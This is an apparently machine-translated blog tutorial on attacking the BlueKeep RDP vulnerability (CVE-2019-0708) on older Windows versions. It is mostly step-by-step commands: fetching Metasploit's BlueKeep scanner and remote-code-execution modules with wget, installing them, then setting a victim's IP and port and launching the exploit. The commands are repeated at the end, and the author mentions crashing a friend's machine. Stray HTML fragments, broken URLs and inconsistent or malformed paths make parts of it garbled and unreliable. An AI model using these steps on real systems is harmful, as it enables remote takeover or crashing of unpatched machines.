CVE-2019-0708
Windows was once again exposed to a high-risk remote vulnerability CVE-2019-0708 with great destructive power. Once the attacker successfully exploits the vulnerability, he can execute arbitrary code on the target system, including obtaining sensitive information, executing remote code, launching a denial of service attack, and other attacks. What’s more serious is that this vulnerability is triggered without user interaction, and attackers can use the vulnerability to create a WannaCry-like worm comparable to the WannaCry-like worm that swept the world in 2017, so as to spread and destroy it on a large scale.
Just today Microsoft officially released exp
Scope of influence
- Windows 7
- Windows Server 2008 R2
- Windows Server 2008
- Windows 2003< /li>
- Windows XP
First update our kaili
apt-get install metasploit-framework
After the update is complete
Open msfconsole, there is no use program but only detection tools
Download exp
< p>Netdisk: Link: https://pan.baidu.com/s/11He0JOhvKfWPaXCcclmKtQ Extraction code: vh8h
wget download
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/ edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://raw.githubusercontent.com/rapid7/metasploit -framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
wget https://raw.githubusercontent.com/rapid7/metasploit -framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://raw.githubusercontent.com/rapid7/metasploit -framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Put the downloaded files in sequence
Execute the command to create the exploit folder
mkdir -p /usr/share/metasploit-framework/modules/exploit/windows/rdp/
mkdir -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mkdir -p /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp rdp.rb /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
Reopen msfconsole
Reload
reload_all
We import
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
This exp currently only has windwos 7 /2008r2 and it is a community castrated version that is easy to blue screen
set RHOSTS set IP
set RPORT set RDP Port number
Use set target ID to set the victim machine
Use the exploit to start the attack and wait for the connection to be established
Of course you can also choose other
show targets
Run directly
p>
It has been reproduced once before. As soon as the reproduce is executed, it will blue screen and put a friend successfully
And mine
VulnerabilityFix strong>
http://weishi.360.cn/mianyigongju.html
Go to this address to fix the bug
< /span>
apt-get install metasploit-framework
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://raw.githubusercontent.com/rapid7/metasploit -framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
wget https://raw.githubusercontent.com/rapid7/metasploit -framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://raw.githubusercontent.com/rapid7/metasploit -framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
mkdir -p /usr/share/metasploit-framework/modules windows/rdp/
mkdir -p /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
mkdir -p /usr/share/metasploit-framework/modules/exploits/windows/rdp/
cp rdp.rb /usr/share/metasploit-framework/modules/exploit/windows/rdp/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
reload_all
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce